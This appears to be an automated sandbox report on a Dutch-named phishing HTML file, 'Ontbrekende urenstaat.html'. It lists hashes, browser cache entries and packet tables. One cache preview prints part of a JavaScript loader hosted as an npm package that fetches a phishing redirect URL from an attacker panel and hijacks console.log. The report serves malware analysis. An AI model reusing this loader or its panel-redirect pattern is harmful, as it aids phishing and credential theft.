File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	553
Entropy (8bit):	4.662821081936326
Encrypted:	false
SSDEEP:	12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
MD5:	0127426BF3BA07FF7211399DDF5186C4
SHA1:	221D89F3261F545AC58848EBA300E0134C76FF9A
SHA-256:	982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
SHA-512:	6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://sun-shine.pages.dev/favicon.ico
Preview:	<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zstandard compressed data (v0.8+), Dictionary ID: None
Category:	downloaded
Size (bytes):	69
Entropy (8bit):	4.9704182971697515
Encrypted:	false
SSDEEP:	3:Wh8leoztRRV1C+0hrzL2gABHJliLn:goZRhdOKLHriLn
MD5:	85486DE2880AA119E35F54BCBD66F984
SHA1:	B42F2372116F75261C1115656448510832191E14
SHA-256:	8CF1822F32F10E58A664892DCB7E8F1CDACF22BA5E38EA4D53D88A271BCADA97
SHA-512:	1EE7385512CEB5C7F398CAFE351FC8DF88BE63E8A807EEA81B3B9447189376698584BBB080A07DD27458AD7D958C626099DF2B1DAEA9389C06A1A3A77240087C
Malicious:	false
Reputation:	low
URL:	https://noirlegacy-panel-1.website/api/uuurrlll
Preview:	(./..X...{"message":"https:\/\/sun-shine.pages.dev\/#?refid="}...7..

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zstandard compressed data (v0.8+), Dictionary ID: None
Category:	dropped
Size (bytes):	69
Entropy (8bit):	4.9704182971697515
Encrypted:	false
SSDEEP:	3:Wh8leoztRRV1C+0hrzL2gABHJliLn:goZRhdOKLHriLn
MD5:	85486DE2880AA119E35F54BCBD66F984
SHA1:	B42F2372116F75261C1115656448510832191E14
SHA-256:	8CF1822F32F10E58A664892DCB7E8F1CDACF22BA5E38EA4D53D88A271BCADA97
SHA-512:	1EE7385512CEB5C7F398CAFE351FC8DF88BE63E8A807EEA81B3B9447189376698584BBB080A07DD27458AD7D958C626099DF2B1DAEA9389C06A1A3A77240087C
Malicious:	false
Reputation:	low
Preview:	(./..X...{"message":"https:\/\/sun-shine.pages.dev\/#?refid="}...7..

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	2045
Entropy (8bit):	3.7645878945655893
Encrypted:	false
SSDEEP:	24:yimOcnnVh6H56M3NLeWVipUBec+Zd3e9cMZjdzY0Ne9cMZjd8a6KA:yi2nVihh3VipzRZd3e9TpNe9TYa6n
MD5:	1E70D59C9D41AB8E504358AB40E3B10A
SHA1:	073E4AFC1204C78C6712B190DC3462232C30E26C
SHA-256:	2CFD6C3070CC1F921743450E2882F10DD0E129E3A8AAB51B5B52B3FEAF121EDD
SHA-512:	C97CB0C4A21816D03DDD7069B4F18C738826AB26B071EEE93139A7BFA9C96FBFB6A0B2ABF3792CC600E88E90FE9F6EE3EB485BE67D45EF89BCD27C797055A833
Malicious:	false
Reputation:	low
URL:	https://cdn.jsdelivr.net/npm/slowingdown4u@1.0.2/hard.js
Preview:	..const urlx = 'https://noirlegacy-panel-1.website/api/uuurrlll';..... // Function to perform GET request. async function fetchData() {. try {. . const response = await fetch(urlx);.. if (!response.ok) {. throw new Error('Network response was not ok');. }.. . const data = await response.json();. . const message = data.message;.. console.log(message).. return message ;.. . let messageUrl = message;.. } catch (error) {. // Handle errors. console.error('There was a problem with the fetch operation:', error);. }. }... async function run() {. console.log("readya!");. let key = "";. let jk = "";. const originalConsoleLog = console.log;. console.log = function(message) {.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (408), with CRLF line terminators
Entropy (8bit):	4.66916796739771
TrID:
File name:	Ontbrekende urenstaat.html
File size:	5'727 bytes
MD5:	71ec830c0e5360c37c5575e26e15c7c5
SHA1:	f306ec8a0dae374d492df53e4550ad11e4719a10
SHA256:	4b93fc3bcdcfa7321ba8a406bf9134ce67822cfc9372e57e3e7d6a24fbb9142e
SHA512:	d4876dc8fb6a2bf42dfce1a69f120a3ed6f362fb4db6f4d22182fa99573f6ffef49de470dd65b4570467039c63174e86d3d59a6556a64aead37f955c3e391e31
SSDEEP:	96:SItUvYOhDyyJC5f1z9il7qInnW7z4bP0BG1QEZ:SItUXhDHAp1z9d4bcG1Z
TLSH:	26C183907C45508692B7A3B29F33D209FE765617130243587FEC57460FBAA258A93FEC
File Content Preview:	.. <!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="creator" content="CodePhantom">.. <title>Access Portal</title>.. <style>..

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 15:05:23.106899023 CET	49674	443	192.168.2.9	2.23.227.208
Mar 10, 2025 15:05:23.122569084 CET	49673	443	192.168.2.9	2.23.227.215
Mar 10, 2025 15:05:23.122565031 CET	49675	443	192.168.2.9	2.23.227.208
Mar 10, 2025 15:05:28.795011997 CET	49676	80	192.168.2.9	2.23.73.143
Mar 10, 2025 15:05:28.796253920 CET	49677	443	192.168.2.9	2.19.104.63
Mar 10, 2025 15:05:30.905292034 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:30.905323982 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:30.905385017 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:30.905774117 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:30.905786037 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:32.711643934 CET	49674	443	192.168.2.9	2.23.227.208
Mar 10, 2025 15:05:32.727195024 CET	49673	443	192.168.2.9	2.23.227.215
Mar 10, 2025 15:05:32.727194071 CET	49675	443	192.168.2.9	2.23.227.208
Mar 10, 2025 15:05:32.968451977 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:32.969240904 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:32.969259024 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:32.970705032 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:32.970762014 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:32.973309040 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:32.973403931 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:32.973593950 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:32.973598957 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:33.024996042 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:33.800638914 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:33.800705910 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:33.800769091 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:33.800820112 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:33.800864935 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:33.802227974 CET	49693	443	192.168.2.9	151.101.1.229
Mar 10, 2025 15:05:33.802239895 CET	443	49693	151.101.1.229	192.168.2.9
Mar 10, 2025 15:05:33.850493908 CET	49694	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.850531101 CET	443	49694	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:33.850585938 CET	49694	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.851242065 CET	49694	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.851253986 CET	443	49694	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:33.921230078 CET	49694	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.922084093 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.922126055 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:33.922197104 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.922643900 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:33.922655106 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:33.964241982 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:33.964289904 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:33.964323997 CET	443	49694	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:33.964864969 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:33.964864969 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:33.964900970 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:36.226178885 CET	443	49694	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:36.226562977 CET	49694	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:36.600169897 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:36.602657080 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:36.602669001 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:36.603697062 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:36.603771925 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:36.604810953 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:36.604863882 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:36.648580074 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:36.648595095 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:36.695302010 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:38.104610920 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.104696035 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:38.217924118 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.220398903 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:38.220432997 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.220670938 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:38.220678091 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.220902920 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:38.220907927 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.675580978 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.675874949 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:38.675904989 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.773212910 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:38.820125103 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:39.217650890 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:39.259633064 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:39.301085949 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:39.301141024 CET	443	49699	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:39.301240921 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:39.301717043 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:39.301750898 CET	443	49700	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:39.301805019 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:39.302390099 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:39.302402020 CET	443	49700	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:39.303106070 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:39.303117037 CET	443	49699	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:39.798785925 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:39.798844099 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:39.798911095 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:39.799546003 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:39.799565077 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:41.287270069 CET	443	49699	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.287651062 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.287693977 CET	443	49699	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.288897991 CET	443	49699	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.289002895 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.290436029 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.290468931 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.290513039 CET	443	49699	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.290519953 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.290591955 CET	49699	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.290978909 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.291018963 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.291110992 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.291666031 CET	443	49700	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.291836023 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.291851044 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.291928053 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.291956902 CET	443	49700	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.293477058 CET	443	49700	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.293540001 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.294501066 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.294599056 CET	443	49700	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.294619083 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.294619083 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.294657946 CET	49700	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.294958115 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.295018911 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:41.295084953 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.295381069 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:41.295408964 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.360470057 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.360878944 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.360903025 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.361984015 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.362066984 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.363018036 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.363106012 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.363213062 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.363223076 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.416380882 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.494574070 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.495606899 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.495640993 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.496697903 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.496840954 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.497123957 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.497198105 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.541291952 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.541321993 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.587372065 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.600893021 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:43.601036072 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:43.601139069 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:43.601166010 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:43.603416920 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:43.603437901 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:43.603558064 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:43.603562117 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:43.603699923 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:43.603703976 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:43.877743959 CET	49672	443	192.168.2.9	2.23.227.208
Mar 10, 2025 15:05:43.877800941 CET	443	49672	2.23.227.208	192.168.2.9
Mar 10, 2025 15:05:43.897212029 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.897329092 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.897392035 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.900032043 CET	49703	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:43.900049925 CET	443	49703	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:43.985280991 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:44.028335094 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:44.035021067 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:44.035358906 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:44.035402060 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:44.136974096 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:44.188823938 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:44.437324047 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:44.437406063 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:44.437453032 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:44.441150904 CET	49702	443	192.168.2.9	188.114.96.3
Mar 10, 2025 15:05:44.441173077 CET	443	49702	188.114.96.3	192.168.2.9
Mar 10, 2025 15:05:44.660551071 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:44.706376076 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:44.756381989 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:05:44.812237024 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:05:45.619191885 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:05:45.625032902 CET	80	49706	142.250.184.195	192.168.2.9
Mar 10, 2025 15:05:45.625118971 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:05:45.625426054 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:05:45.631175995 CET	80	49706	142.250.184.195	192.168.2.9
Mar 10, 2025 15:05:46.217078924 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:46.217168093 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:46.217396021 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:46.295169115 CET	80	49706	142.250.184.195	192.168.2.9
Mar 10, 2025 15:05:46.300919056 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:05:46.306027889 CET	80	49706	142.250.184.195	192.168.2.9
Mar 10, 2025 15:05:46.491003990 CET	80	49706	142.250.184.195	192.168.2.9
Mar 10, 2025 15:05:46.539447069 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:05:48.089245081 CET	49696	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:05:48.089279890 CET	443	49696	142.250.184.196	192.168.2.9
Mar 10, 2025 15:05:55.573678970 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:05:55.883182049 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:05:56.493063927 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:05:57.711113930 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:00.117705107 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:04.121028900 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:04.432984114 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:04.826062918 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:04.932974100 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:05.039225101 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:05.131589890 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:05.742871046 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:06.242644072 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:06.945909023 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:08.430591106 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:08.648632050 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:08.742537975 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:09.351834059 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:09.354834080 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:10.555181026 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:12.961121082 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:13.461066008 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:14.164184093 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:14.539129972 CET	49671	443	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:17.773542881 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:23.070517063 CET	49678	443	192.168.2.9	52.182.141.63
Mar 10, 2025 15:06:23.773643017 CET	49679	80	192.168.2.9	2.17.190.73
Mar 10, 2025 15:06:24.226567030 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:06:24.226589918 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:06:27.383611917 CET	49681	80	192.168.2.9	204.79.197.203
Mar 10, 2025 15:06:29.758734941 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:06:29.758771896 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:06:34.009145975 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:34.009200096 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:34.009284973 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:34.009670973 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:34.009682894 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:36.345274925 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:36.346149921 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:36.346174955 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:36.347393990 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:36.348033905 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:36.348212957 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:36.398437023 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:45.943358898 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:45.943449020 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:45.943530083 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:46.088944912 CET	49717	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:06:46.088978052 CET	443	49717	142.250.184.196	192.168.2.9
Mar 10, 2025 15:06:47.102312088 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:06:47.108125925 CET	80	49706	142.250.184.195	192.168.2.9
Mar 10, 2025 15:06:47.108428001 CET	49706	80	192.168.2.9	142.250.184.195
Mar 10, 2025 15:07:09.228055954 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:07:09.228074074 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:07:14.773937941 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:07:14.773957014 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:07:34.073302984 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:34.073415041 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:34.073534966 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:34.074033022 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:34.074057102 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:36.352708101 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:36.353559017 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:36.353590012 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:36.354082108 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:36.354861021 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:36.354940891 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:36.399621964 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:39.126220942 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:07:39.126282930 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:07:39.126703978 CET	49695	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:07:39.126725912 CET	443	49695	172.67.167.135	192.168.2.9
Mar 10, 2025 15:07:44.585028887 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:07:44.585243940 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:07:44.585562944 CET	49701	443	192.168.2.9	172.67.167.135
Mar 10, 2025 15:07:44.585587025 CET	443	49701	172.67.167.135	192.168.2.9
Mar 10, 2025 15:07:45.933175087 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:45.933281898 CET	443	49724	142.250.184.196	192.168.2.9
Mar 10, 2025 15:07:45.933361053 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:46.088401079 CET	49724	443	192.168.2.9	142.250.184.196
Mar 10, 2025 15:07:46.088438034 CET	443	49724	142.250.184.196	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 15:05:29.774183989 CET	53	62426	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:29.927481890 CET	53	56053	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:30.892563105 CET	65425	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:30.892733097 CET	63599	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:30.899761915 CET	53	65425	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:30.900779009 CET	53	63599	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:33.816589117 CET	50358	53	192.168.2.9	1.1.1.1
